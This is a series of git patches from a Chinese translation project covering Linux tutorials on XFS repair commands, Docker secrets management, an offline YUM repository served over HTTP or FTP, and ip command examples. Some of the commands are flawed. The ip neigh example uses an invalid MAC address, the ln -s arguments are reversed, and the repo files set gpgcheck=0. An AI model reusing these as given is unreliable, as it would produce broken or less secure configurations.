+可以使用 `xfs_repair` 命令进行文件系统一致性检查和修复。使用 `-n` 参数则并不对文件系统做出什么实质性的修改。它只会搜索并报告要做哪些修改。若不带 `-n` 参数,则会修改文件系统以保证文件系统的纯净。
-Please note that you need to un-mount XFS filesystem before you can run checks on it. Otherwise you will see below error.
+请注意,在检查之前,你需要先卸载 XFS 文件系统。否则会报错。
```
root@kerneltalks # xfs_repair -n /dev/xvdf
@@ -77,7 +77,7 @@ xfs_repair: /dev/xvdf contains a mounted and writable filesystem
fatal error -- couldn't initialize XFS library
```
-Once successfully un-mounting file system you can run command on it.
+卸载后运行检查命令。
```
root@kerneltalks # xfs_repair -n /dev/xvdf
Phase 1 - find and verify superblock...
@@ -111,11 +111,7 @@ Phase 7 - verify link counts...
No modify flag set, skipping filesystem flush and exiting.
```
-In above output you can observe, in each phase command shows possible modification which can be done to make file system healthy. If you want command to do those modification during scan then run command without any switch.
-
-```
-xfs_repair output
-```
+你可以看到,命令在每个阶段都显示出了为了文件系统变得健康可能做出的修改。若你希望命令在扫描时实际应用这些修改,则不带任何参数运行命令即可。
```
root @ kerneltalks # xfs_repair /dev/xvdf
@@ -153,18 +149,18 @@ Phase 7 - verify and correct link counts . . .
done
```
-In above output you can observer `xfs_repair` command is executing possible filesystem modification as well to make it healthy.
+你会发现 `xfs_repair` 命令对文件系统做出了修改让其变得健康。
-### Check XFS version and details
+### 查看 XFS 版本以及它的详细信息
-Checking xfs file system version is easy. Run `xfs_info` command with `-V` switch on mount point.
+查看 xfs 文件系统版本很简单。使用 `-V` 参数运行 `xfs_info` 再加上挂载点就行了。
```
root@kerneltalks # xfs_info -V /shrikant
xfs_info version 4.5.0
```
-To view details of XFS file system like block size and number of blocks which helps you in calculating new block number for growing XFS file system, use `xfs_info` without any switch.
+若要查看 XFS 文件系统的详细信息,比如想计算扩容 XFS 文件系统时要新增多少个块,需要了解块大小,块的个数等信息,则不带任何选项运行 `xfs_info` 加上挂载点。
```
root@kerneltalks # xfs_info /shrikant
@@ -179,9 +175,9 @@ log =internal bsize=4096 blocks=2560, version=2
realtime =none extsz=4096 blocks=0, rtextents=0
```
-It displays all details as it shows while creating XFS file system
+则会显示 XFS 文件系统的所有详细信息,就跟创建 XFS 文件系统时显示的信息一样。
-There are another XFS file system management commands which alters and manages its metadata. We will cover them in another article.
+此外还有一些 XFS 文件系统管理命令可以修改并管理 XFS 的元数据。我们将在另一篇文章中来讲解。
--------------------------------------------------------------------------------
From 344e6a923b3d96f6ee6cd6e1a7edf5fb4c02d734 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 13 Jan 2018 10:03:44 +0800
Subject: [PATCH 281/371] translate done: 20180102 xfs file system commands
with examples.md
---
.../tech/20180102 xfs file system commands with examples.md | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/translated/tech/20180102 xfs file system commands with examples.md b/translated/tech/20180102 xfs file system commands with examples.md
index 4b9e878279..940676dc7a 100644
--- a/translated/tech/20180102 xfs file system commands with examples.md
+++ b/translated/tech/20180102 xfs file system commands with examples.md
@@ -1,5 +1,4 @@
-translating by lujun9972
-xfs file system commands with examples
+通过案例学习 xfs 文件系统相关命令
======
![Learn xfs commands with examples][1]
From 0b41637a31535a695df9c53c79813abeb4779b41 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sat, 13 Jan 2018 10:22:32 +0800
Subject: [PATCH 282/371] PRF:20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@imquanquan 我又复校了一遍,有你帮我初校,省心多了。@HardworkFish
---
...9 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 52 +++++++------------
1 file changed, 20 insertions(+), 32 deletions(-)
diff --git a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
index 418a43bd00..e8434a1920 100644
--- a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
+++ b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
@@ -1,36 +1,35 @@
-
-Dockers 涉密信息(Secrets)管理介绍
+Docker 涉密信息管理介绍
====================================
-容器正在改变我们对应用程序和基础设施的看法。无论容器内的代码量是大还是小,容器架构都会引起代码如何与硬件相互作用方式的改变 —— 它从根本上将其从基础设施中抽象出来。对于容器安全来说,在 Docker 中,容器的安全性有三个关键组成部分,他们相互作用构成本质上更安全的应用程序。
+容器正在改变我们对应用程序和基础设施的看法。无论容器内的代码量是大还是小,容器架构都会引起代码如何与硬件相互作用方式的改变 —— 它从根本上将其从基础设施中抽象出来。对于容器安全来说,在 Docker 中,容器的安全性有三个关键组成部分,它们相互作用构成本质上更安全的应用程序。
- ![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/e12387a1-ab21-4942-8760-5b1677bc656d-1.jpg?w=1140&ssl=1)
+![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/e12387a1-ab21-4942-8760-5b1677bc656d-1.jpg?w=1140&ssl=1)
-构建更安全的应用程序的一个关键因素是与系统和其他应用程序进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证 —— 通常称为应用程序涉密信息。我们很高兴可以推出 Docker 涉密信息,一个容器的原生解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密信息分发功能。
+构建更安全的应用程序的一个关键因素是与系统和其他应用程序进行安全通信,这通常需要证书、令牌、密码和其他类型的验证信息凭证 —— 通常称为应用程序涉密信息。我们很高兴可以推出 Docker Secrets,这是一个容器原生的解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密信息分发功能。
-有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密信息分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密信息管理不善的增加,使得不安全的本地解决方案变得十分普遍,比如像 GitHub 将嵌入涉密信息到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。
+有了容器,现在应用程序是动态的,可以跨越多种环境移植。这使得现存的涉密信息分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密信息管理不善的增加,在不安全的、土造的方案中(如将涉密信息嵌入到 GitHub 这样的版本控制系统或者同样糟糕的其它方案),这种情况十分常见。
-### Docker 涉密信息(Secrets)管理介绍
+### Docker 涉密信息管理介绍
-根本上我们认为,如果有一个标准的接口来访问涉密信息,应用程序就更安全了。任何好的解决方案也必须遵循安全性实践,例如在传输的过程中,对涉密信息进行加密;在空余的时候也对涉密数据进行加密;防止涉密信息在应用最终使用时被无意泄露;并严格遵守最低权限原则,即应用程序只能访问所需的涉密信息,不能多也不能不少。
+根本上我们认为,如果有一个标准的接口来访问涉密信息,应用程序就更安全了。任何好的解决方案也必须遵循安全性实践,例如在传输的过程中,对涉密信息进行加密;在不用的时候也对涉密数据进行加密;防止涉密信息在应用最终使用时被无意泄露;并严格遵守最低权限原则,即应用程序只能访问所需的涉密信息,不能多也不能不少。
-通过将涉密信息整合到 Docker 的业务流程,我们能够在遵循这些确切的原则下为涉密信息的管理问题提供一种解决方案。
+通过将涉密信息整合到 Docker 编排,我们能够在遵循这些确切的原则下为涉密信息的管理问题提供一种解决方案。
-下图提供了一个高层次视图,并展示了 Docker swarm mode 体系架构是如何将一种新类型的对象 —— 一个涉密信息对象,安全地传递给我们的容器。
+下图提供了一个高层次视图,并展示了 Docker swarm 模式体系架构是如何将一种新类型的对象 —— 一个涉密信息对象,安全地传递给我们的容器。
- ![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1)
+![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1)
-在 Docker 中,一个涉密信息是任意的数据块,比如密码、SSH 密钥、TLS 凭证,或者任何其他本质上敏感的数据。当你将一个涉密信息加入集群(通过执行 `docker secret create` )时,利用在引导新集群时自动创建的内置证书颁发机构,Docker 通过相互认证的 TLS 连接将密钥发送给集群管理器。
+在 Docker 中,涉密信息是任意的数据块,比如密码、SSH 密钥、TLS 凭证,或者任何其他本质上敏感的数据。当你将一个涉密信息加入 swarm 集群(通过执行 `docker secret create` )时,利用在引导新集群时自动创建的[内置证书颁发机构][17],Docker 通过相互认证的 TLS 连接将密钥发送给 swarm 集群管理器。
```
$ echo "This is a secret" | docker secret create my_secret_data -
```
-一旦,涉密信息到达某个管理节点,它将被保存到内部的 Raft 存储区中。该存储区使用 NACL 开源加密库中的 Salsa20、Poly1305 加密算法生成的 256 位密钥进行加密,以确保没有把任何涉密信息数据永久写入未加密的磁盘。向内部存储写入涉密信息,赋予了涉密信息跟其他集群数据一样的高可用性。
+一旦,涉密信息到达某个管理节点,它将被保存到内部的 Raft 存储区中。该存储区使用 NACL 开源加密库中的 Salsa20、Poly1305 加密算法生成的 256 位密钥进行加密,以确保从来不会把任何涉密信息数据写入未加密的磁盘。将涉密信息写入到内部存储,赋予了涉密信息跟其它 swarm 集群数据一样的高可用性。
-当集群管理器启动的时,包含涉密信息的被加密过的 Raft 日志通过每一个节点唯一的数据密钥进行解密。此密钥以及用于与集群其余部分通信的节点的 TLS 证书可以使用一个集群范围的加密密钥进行加密。该密钥称为“解锁密钥”,也使用 Raft 进行传递,将且会在管理器启动的时候使用。
+当 swarm 集群管理器启动时,包含涉密信息的加密 Raft 日志通过每一个节点独有的数据密钥进行解密。此密钥以及用于与集群其余部分通信的节点 TLS 证书可以使用一个集群级的加密密钥进行加密。该密钥称为“解锁密钥”,也使用 Raft 进行传递,将且会在管理器启动的时候使用。
-当授予新创建或运行的服务权限访问某个涉密信息权限时,其中一个管理器节点(只有管理员可以访问被存储的所有涉密信息)会通过已经建立的TLS连接将其分发给正在运行特定服务的节点。这意味着节点自己不能请求涉密信息,并且只有在管理员提供给他们的时候才能访问这些涉密信息 —— 严格地控制请求涉密信息的服务。
+当授予新创建或运行的服务权限访问某个涉密信息权限时,其中一个管理器节点(只有管理器可以访问被存储的所有涉密信息)会通过已经建立的 TLS 连接将其分发给正在运行特定服务的节点。这意味着节点自己不能请求涉密信息,并且只有在管理器提供给他们的时候才能访问这些涉密信息 —— 严格地控制请求涉密信息的服务。
```
$ docker service create --name="redis" --secret="my_secret_data" redis:alpine
@@ -54,38 +53,27 @@ $ docker exec -it $(docker ps --filter name=redis -q) cat /run/secrets/my_secret
cat: can't open '/run/secrets/my_secret_data': No such file or directory
```
-查看 Docker Secret 文档以获取更多信息和示例,了解如何创建和管理您的涉密信息。同时,特别推荐 Docker 安全合作团 Laurens Van Houtven (https://www.lvh.io/) 和使这一特性成为现实的团队。
-
-[Get safer apps for dev and ops w/ new #Docker secrets management][5]
-
-[CLICK TO TWEET][6]
-
-###
-![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/Screenshot-2017-02-08-23.30.13.png?resize=1032%2C111&ssl=1)
+查看 [Docker Secret 文档][18]以获取更多信息和示例,了解如何创建和管理您的涉密信息。同时,特别感谢 [Laurens Van Houtven](https://www.lvh.io/) 与 Docker 安全和核心团队合作使这一特性成为现实。
### 通过 Docker 更安全地使用应用程序
-Docker 涉密信息旨在让开发人员和 IT 运营团队可以轻松使用,以用于构建和运行更安全的应用程序。它是是首个被设计为既能保持涉密信息安全,并且仅在特定的容器需要它来进行必要的涉密信息操作的时候使用。从使用 Docker Compose 定义应用程序和涉密数据,到 IT 管理人员直接在 Docker Datacenter 中部署的 Compose 文件、涉密信息,networks 和 volumes 都将被加密并安全地跟应用程序一起传输。
+Docker 涉密信息旨在让开发人员和 IT 运营团队可以轻松使用,以用于构建和运行更安全的应用程序。它是首个被设计为既能保持涉密信息安全,并且仅在特定的容器需要它来进行必要的涉密信息操作的时候使用。从使用 Docker Compose 定义应用程序和涉密数据,到 IT 管理人员直接在 Docker Datacenter 中部署的 Compose 文件,涉密信息、网络和数据卷都将加密并安全地与应用程序一起传输。
更多相关学习资源:
-* [1.13 Docker 数据中心具有 Secrets, 安全扫描、容量缓存等新特性][7]
-
-* [下载 Docker ][8] 且开始学习
-
+* [1.13 Docker 数据中心具有 Secrets、安全扫描、容量缓存等新特性][7]
+* [下载 Docker][8] 且开始学习
* [在 Docker 数据中心尝试使用 secrets][9]
-
* [阅读文档][10]
-
* 参与 [即将进行的在线研讨会][11]
--------------------------------------------------------------------------------
via: https://blog.docker.com/2017/02/docker-secrets-management/
-作者:[ Ying Li][a]
+作者:[Ying Li][a]
译者:[HardworkFish](https://github.com/HardworkFish)
-校对:[imquanquan](https://github.com/imquanquan)
+校对:[imquanquan](https://github.com/imquanquan), [wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From f7f88d3a42a5d1c14f4dcf0f54f776d76aff017d Mon Sep 17 00:00:00 2001
From: wxy
Date: Sat, 13 Jan 2018 10:23:33 +0800
Subject: [PATCH 283/371] PUB:20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
@HardwordFish @imquanquan https://linux.cn/article-9229-1.html
---
.../20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md (100%)
diff --git a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/published/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
similarity index 100%
rename from translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
rename to published/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
From d7579c0f9d4b6c38d68c5e681b574a38ad233c91 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 13 Jan 2018 11:05:44 +0800
Subject: [PATCH 284/371] translate done: 20180103 Creating an Offline YUM
repository for LAN.md
---
...ating an Offline YUM repository for LAN.md | 111 ------------------
...ating an Offline YUM repository for LAN.md | 108 +++++++++++++++++
2 files changed, 108 insertions(+), 111 deletions(-)
delete mode 100644 sources/tech/20180103 Creating an Offline YUM repository for LAN.md
create mode 100644 translated/tech/20180103 Creating an Offline YUM repository for LAN.md
diff --git a/sources/tech/20180103 Creating an Offline YUM repository for LAN.md b/sources/tech/20180103 Creating an Offline YUM repository for LAN.md
deleted file mode 100644
index 315da3efbd..0000000000
--- a/sources/tech/20180103 Creating an Offline YUM repository for LAN.md
+++ /dev/null
@@ -1,111 +0,0 @@
-translating by lujun9972
-Creating an Offline YUM repository for LAN
-======
-In our earlier tutorial, we discussed " **[How we can create our own yum repository with ISO image& by mirroring an online yum repository][1]** ". Creating your own yum repository is a good idea but not ideal if you are only using 2-3 Linux machines on your network. But it definitely has advantages when you have large number of Linux servers on your network that are updated regularly or when you have some sensitive Linux machines that can't be exposed to Internet directly.
-
-When we have large number of Linux systems & each system is updating directly from internet, data consumed will be enormous. In order to save the data, we can create an offline yum & share it over our Local network. Other Linux machines on network will then fetch system updates directly from this Local yum, thus saving data & also transfer speed also be very good since we will be on our local network.
-
-We can share our yum repository using any of the following or both methods:
-
- * **Using Web Server (Apache)**
- * **Using ftp (VSFTPD)**
-
-
-
-We will be discussing both of these methods but before we start, you should create a YUM repository using my earlier tutorial ( **[READ HERE][1]** )
-
-
-## Using Web Server
-
-Firstly we need to install web-server (Apache) on our yum server which has IP address **192.168.1.100**. Since we have already configured a yum repository for this system, we will install apache web server using yum command,
-
-```
-$ yum install httpd
-```
-
-Next, we need to copy all the rpm packages to default apache root directory i.e. **/var/www/html** or since we have already copied our packages to **/YUM** , we can create a symbolic link from /var/www/html to /YUM
-
-```
-$ ln -s /var/www/html/Centos /yum
-```
-
-Restart you web-server to implement changes
-
-```
-$ systemctl restart httpd
-```
-
-
-### Configuring client machine
-
-Configurations for sharing Yum repository on server side are complete & now we will configure our client machine, with an IP address **192.168.1.101** , to receive updates from our created offline yum.
-
-Create a file named **offline-yum.repo** in **/etc/yum.repos.d** folder & enter the following details,
-
-```
-$ vi /etc/yum.repos.d/offline-yum.repo
-```
-
-```
-name=Local YUM
-baseurl=http://192.168.1.100/CentOS/7
-gpgcheck=0
-enabled=1
-```
-
-We have configured your Linux machine to receive updates over LAN from your offline yum repository. To confirm if the repository is working fine, try to install/update packages using yum command.
-
-## Using FTP server
-
-For sharing our YUM over ftp, we will firstly install the required package i.e vsftpd
-
-```
-$ yum install vsftpd
-```
-
-Default root directory for vsftp is /var/ftp/pub, so either copy rpm packages to this folder or create a symbolic link from /var/ftp/pub,
-
-```
-$ ln -s /var/ftp/pub /YUM
-```
-
-Now, restart server for implement the changes
-
-```
-$ systemctl restart vsftpd
-```
-
-### Configuring client machine
-
-We will now create a file named **offline-yum.repo** in **/etc/yum.repos.d** , as we did above & enter the following details,
-
-```
-$ vi /etc/yum.repos.d/offline-yum.repo
-```
-
-```
-[Offline YUM]
-name=Local YUM
-baseurl=ftp://192.168.1.100/pub/CentOS/7
-gpgcheck=0
-enabled=1
-```
-
-Your client machine is now ready to receive updates over ftp. For configuring vsftpd server to share files with other Linux system , [**read tutorial here**][2].
-
-Both methods for sharing an offline yum over LAN are good & you can choose either of them, both of these methods should work fine. If you are having any queries/comments, please share them in the comment box down below.
-
-
---------------------------------------------------------------------------------
-
-via: http://linuxtechlab.com/offline-yum-repository-for-lan/
-
-作者:[Shusain][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://linuxtechlab.com/author/shsuain/
-[1]:http://linuxtechlab.com/creating-yum-repository-iso-online-repo/
-[2]:http://linuxtechlab.com/ftp-secure-installation-configuration/
diff --git a/translated/tech/20180103 Creating an Offline YUM repository for LAN.md b/translated/tech/20180103 Creating an Offline YUM repository for LAN.md
new file mode 100644
index 0000000000..7680e2dc3c
--- /dev/null
+++ b/translated/tech/20180103 Creating an Offline YUM repository for LAN.md
@@ -0,0 +1,108 @@
+创建局域网内的离线 YUM 仓库
+======
+在早先的教程中,我们讨论了" **[如何使用 ISO 镜像和镜像在线 yum 仓库的方式来创建自己的 yum 仓库 ][1]** "。创建自己的 yum 仓库是一个不错的想法,但若网络中只有 2-3 台 Linux 机器那就没啥必要了。不过若你的网络中有大量的 Linux 服务器,而且这些服务器还需要定时进行升级,或者你有大量服务器无法直接访问因特网,那么创建自己的 yum 仓库就很有必要了。
+
+当我们有大量的 Linux 服务器,而每个服务器都直接从因特网上升级系统时,数据消耗会很可观。为了节省数据量,我们可以创建个离线 yum 源并将之分享到本地网络中。网络中的其他 Linux 机器然后就可以直接从本地 yum 上获取系统更新,从而节省数据量,而且传输速度也会很好。
+
+我们可以使用下面两种方法来分享 yum 仓库:
+
+ * **使用 Web 服务器 (Apache)**
+ * **使用 ftp (VSFTPD)**
+
+
+在开始讲解这两个方法之前,我们需要先根据之前的教程创建一个 YUM 仓库( **[看这里 ][1]** )
+
+## 使用 Web 服务器
+
+首先在 yum 服务器上安装安装 Web 服务器 (Apache),我们假设服务器 IP 是 **192.168.1.100**。我们已经在这台系统上配置好了 yum 仓库,现在我们来使用 yum 命令安装 apache web 服务器,
+
+```
+$ yum install httpd
+```
+
+下一步,拷贝所有的 rpm 包到默认的 apache 跟目录下,即 **/var/www/html**,由于我们已经将包都拷贝到了 **/YUM** 下,我们也可以创建一个软连接来从 /var/www/html 指向 /YUM
+
+```
+$ ln -s /var/www/html/Centos /yum
+```
+
+重启 web 服务器应用变更
+
+```
+$ systemctl restart httpd
+```
+
+
+### 配置客户端机器
+
+服务端的配置就完成了,现在需要配置下客户端来从我们创建的离线 yum 中获取升级包,这里假设客户端 IP 为 **192.168.1.101**。
+
+在 `/etc/yum.repos.d` 目录中创建 `offline-yum.repo` 文件,输入如下信息,
+
+```
+$ vi /etc/yum.repos.d/offline-yum.repo
+```
+
+```
+name=Local YUM
+baseurl=http://192.168.1.100/CentOS/7
+gpgcheck=0
+enabled=1
+```
+
+客户端也配置完了。试一下用 yum 来安装/升级软件包来确认仓库是正常工作的。
+
+## 使用 FTP 服务器
+
+在 FTP 上分享 YUM,首先需要安装所需要的软件包,即 vsftpd
+
+```
+$ yum install vsftpd
+```
+
+vsftp 的默认根目录为 `/var/ftp/pub`,因此你可以拷贝 rpm 包到这个目录或着为它创建一个软连接,
+
+```
+$ ln -s /var/ftp/pub /YUM
+```
+
+重启服务应用变更
+
+```
+$ systemctl restart vsftpd
+```
+
+### 配置客户端机器
+
+像上面一样,在 `/etc/yum.repos.d` 中创建 **offline-yum.repo** 文件,并输入下面信息,
+
+```
+$ vi /etc/yum.repos.d/offline-yum.repo
+```
+
+```
+[Offline YUM]
+name=Local YUM
+baseurl=ftp://192.168.1.100/pub/CentOS/7
+gpgcheck=0
+enabled=1
+```
+
+现在客户机可以通过 ftp 接受升级了。要配置 vsftpd 服务器为其他 Linux 系统分享文件,请[**阅读这篇指南 **][2]。
+
+这两种方法都很不错,你可以任意选择其中一种方法。有任何疑问或这想说的话,欢迎在下面留言框中留言。
+
+
+--------------------------------------------------------------------------------
+
+via: http://linuxtechlab.com/offline-yum-repository-for-lan/
+
+作者:[Shusain][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://linuxtechlab.com/author/shsuain/
+[1]:http://linuxtechlab.com/creating-yum-repository-iso-online-repo/
+[2]:http://linuxtechlab.com/ftp-secure-installation-configuration/
From 182d56377684186f6312b45857398e522f3ca48f Mon Sep 17 00:00:00 2001
From: wxy
Date: Sat, 13 Jan 2018 11:05:42 +0800
Subject: [PATCH 285/371] PRF&PUB:20170915 12 ip Command Examples for Linux
Users.md
@lujun9972 https://linux.cn/article-9230-1.html
---
... 12 ip Command Examples for Linux Users.md | 99 +++++++++++--------
1 file changed, 59 insertions(+), 40 deletions(-)
rename {translated/tech => published}/20170915 12 ip Command Examples for Linux Users.md (68%)
diff --git a/translated/tech/20170915 12 ip Command Examples for Linux Users.md b/published/20170915 12 ip Command Examples for Linux Users.md
similarity index 68%
rename from translated/tech/20170915 12 ip Command Examples for Linux Users.md
rename to published/20170915 12 ip Command Examples for Linux Users.md
index 3fe629852b..258f548e62 100644
--- a/translated/tech/20170915 12 ip Command Examples for Linux Users.md
+++ b/published/20170915 12 ip Command Examples for Linux Users.md
@@ -1,6 +1,7 @@
-Linux 用户的 12 个 ip 案例
+12 个 ip 命令范例
======
-多年来我们一直使用 `ifconfig` 命令来执行网络相关的任务,比如检查和配置网卡信息。但是 `ifconfig` 已经不再被维护并且在最近版本的 Linux 中被废除了。`ifconfig` 命令已经被 `ip` 命令所替代了。
+
+一年又一年,我们一直在使用 `ifconfig` 命令来执行网络相关的任务,比如检查和配置网卡信息。但是 `ifconfig` 已经不再被维护,并且在最近版本的 Linux 中被废除了! `ifconfig` 命令已经被 `ip` 命令所替代了。
`ip` 命令跟 `ifconfig` 命令有些类似,但要强力的多,它有许多新功能。`ip` 命令完成很多 `ifconfig` 命令无法完成的任务。
@@ -10,16 +11,18 @@ Linux 用户的 12 个 ip 案例
### 案例 1:检查网卡信息
-检查网卡的诸如 IP 地址,子网等网络信息,使用 `ip addr show` 命令
+检查网卡的诸如 IP 地址,子网等网络信息,使用 `ip addr show` 命令:
+
```
[linuxtechi@localhost]$ ip addr show
-or
+或
[linuxtechi@localhost]$ ip a s
```
-这会显示系统中所有可用网卡额相关网络信息,不过如果你想查看某块网卡的信息,则命令为
+这会显示系统中所有可用网卡的相关网络信息,不过如果你想查看某块网卡的信息,则命令为:
+
```
[linuxtechi@localhost]$ ip addr show enp0s3
```
@@ -30,45 +33,52 @@ or
### 案例 2:启用/禁用网卡
-使用 `ip` 命令来启用一个被禁用的网卡
+使用 `ip` 命令来启用一个被禁用的网卡:
+
```
[linuxtechi@localhost]$ sudo ip link set enp0s3 up
```
-而要禁用网卡则使用 `down` 触发器,
+而要禁用网卡则使用 `down` 触发器:
+
```
[linuxtechi@localhost]$ sudo ip link set enp0s3 down
```
### 案例 3:为网卡分配 IP 地址以及其他网络信息
-要为网卡分配 IP 地址,我们使用下面命令
+要为网卡分配 IP 地址,我们使用下面命令:
+
```
[linuxtechi@localhost]$ sudo ip addr add 192.168.0.50/255.255.255.0 dev enp0s3
```
-也可以使用 `ip` 命令来设置广播地址。默认是没有设置广播地址的,设置广播地址的命令为
+也可以使用 `ip` 命令来设置广播地址。默认是没有设置广播地址的,设置广播地址的命令为:
+
```
[linuxtechi@localhost]$ sudo ip addr add broadcast 192.168.0.255 dev enp0s3
```
-我们也可以使用下面命令来根据 IP 地址设置标准的广播地址,
+我们也可以使用下面命令来根据 IP 地址设置标准的广播地址:
+
```
[linuxtechi@localhost]$ sudo ip addr add 192.168.0.10/24 brd + dev enp0s3
```
-若上面例子所示,我们可以使用 `brd` 代替 `broadcast` 来设置广播地址。
+如上面例子所示,我们可以使用 `brd` 代替 `broadcast` 来设置广播地址。
### 案例 4:删除网卡中配置的 IP 地址
-若想从网卡中删掉某个 IP,使用如下 ip 命令
+若想从网卡中删掉某个 IP,使用如下 `ip` 命令:
+
```
[linuxtechi@localhost]$ sudo ip addr del 192.168.0.10/24 dev enp0s3
```
-### 案例 5:为网卡添加别名(假设网卡名为 enp0s3)
+### 案例 5:为网卡添加别名(假设网卡名为 enp0s3)
+
+添加别名,即为网卡添加不止一个 IP,执行下面命令:
-添加别名,即为玩卡添加不止一个 IP,执行下面命令
```
[linuxtechi@localhost]$ sudo ip addr add 192.168.0.20/24 dev enp0s3 label enp0s3:1
```
@@ -77,38 +87,44 @@ or
### 案例 6:检查路由/默认网关的信息
-查看路由信息会给我们显示数据包到达目的地的路由路径。要查看网络路由信息,执行下面命令,
+查看路由信息会给我们显示数据包到达目的地的路由路径。要查看网络路由信息,执行下面命令:
+
```
[linuxtechi@localhost]$ ip route show
```
![ip-route-command-output][8]
-在上面输出结果中,我们能够看到所有网卡上数据包的路由信息。我们也可以获取特定 ip 的路由信息,方法是,
+在上面输出结果中,我们能够看到所有网卡上数据包的路由信息。我们也可以获取特定 IP 的路由信息,方法是:
+
```
[linuxtechi@localhost]$ sudo ip route get 192.168.0.1
```
### 案例 7:添加静态路由
-我们也可以使用 IP 来修改数据包的默认路由。方法是使用 `ip route` 命令
+我们也可以使用 IP 来修改数据包的默认路由。方法是使用 `ip route` 命令:
+
```
[linuxtechi@localhost]$ sudo ip route add default via 192.168.0.150/24
```
-这样所有的网络数据包通过 `192.168.0.150` 来转发,而不是以前的默认路由了。若要修改某个网卡的默认路由,执行
+这样所有的网络数据包通过 `192.168.0.150` 来转发,而不是以前的默认路由了。若要修改某个网卡的默认路由,执行:
+
```
[linuxtechi@localhost]$ sudo ip route add 172.16.32.32 via 192.168.0.150/24 dev enp0s3
```
### 案例 8:删除默认路由
-要删除之前设置的默认路由,打开终端然后运行,
+要删除之前设置的默认路由,打开终端然后运行:
+
```
[linuxtechi@localhost]$ sudo ip route del 192.168.0.150/24
```
-**注意:-** 用上面方法修改的默认路由只是临时有效的,在系统重启后所有的改动都会丢失。要永久修改路由,需要修改/创建 `route-enp0s3` 文件。将下面这行加入其中
+**注意:** 用上面方法修改的默认路由只是临时有效的,在系统重启后所有的改动都会丢失。要永久修改路由,需要修改或创建 `route-enp0s3` 文件。将下面这行加入其中:
+
```
[linuxtechi@localhost]$ sudo vi /etc/sysconfig/network-scripts/route-enp0s3
@@ -121,9 +137,10 @@ or
### 案例 9:检查所有的 ARP 记录
-ARP,是的 `Address Resolution Protocol` 缩写,用于将 IP 地址转换为物理地址(也就是 MAC 地址)。所有的 IP 和其对应的 MAC 明细都存储在一张表中,这张表叫做 ARP 缓存。
+ARP,是地址解析协议的缩写,用于将 IP 地址转换为物理地址(也就是 MAC 地址)。所有的 IP 和其对应的 MAC 明细都存储在一张表中,这张表叫做 ARP 缓存。
+
+要查看 ARP 缓存中的记录,即连接到局域网中设备的 MAC 地址,则使用如下 ip 命令:
-要查看 ARP 缓存中的记录,即连接到局域网中设备的 MAC 地址,则使用如下 ip 命令
```
[linuxtechi@localhost]$ ip neigh
```
@@ -132,28 +149,29 @@ ARP,是的 `Address Resolution Protocol` 缩写,用于将 IP 地址转换为
### 案例 10:修改 ARP 记录
-删除 ARP 记录的命令为
+删除 ARP 记录的命令为:
+
```
[linuxtechi@localhost]$ sudo ip neigh del 192.168.0.106 dev enp0s3
```
-若想往 ARP 缓存中添加新记录,则命令为
+若想往 ARP 缓存中添加新记录,则命令为:
+
```
[linuxtechi@localhost]$ sudo ip neigh add 192.168.0.150 lladdr 33:1g:75:37:r3:84 dev enp0s3 nud perm
```
-这里 **nud** 的意思是 **neghbour state( 邻居状态)**,它的值可以是
-
- * **perm** - 永久有效并且只能被管理员删除
- * **noarp** - 记录有效,但在生命周期过期后就允许被删除了
- * **stale** - 记录有效,但可能已经过期,
- * **reachable** - 记录有效,但超时后就失效了。
-
+这里 `nud` 的意思是 “neghbour state”(网络邻居状态),它的值可以是:
+ * `perm` - 永久有效并且只能被管理员删除
+ * `noarp` - 记录有效,但在生命周期过期后就允许被删除了
+ * `stale` - 记录有效,但可能已经过期
+ * `reachable` - 记录有效,但超时后就失效了
### 案例 11:查看网络统计信息
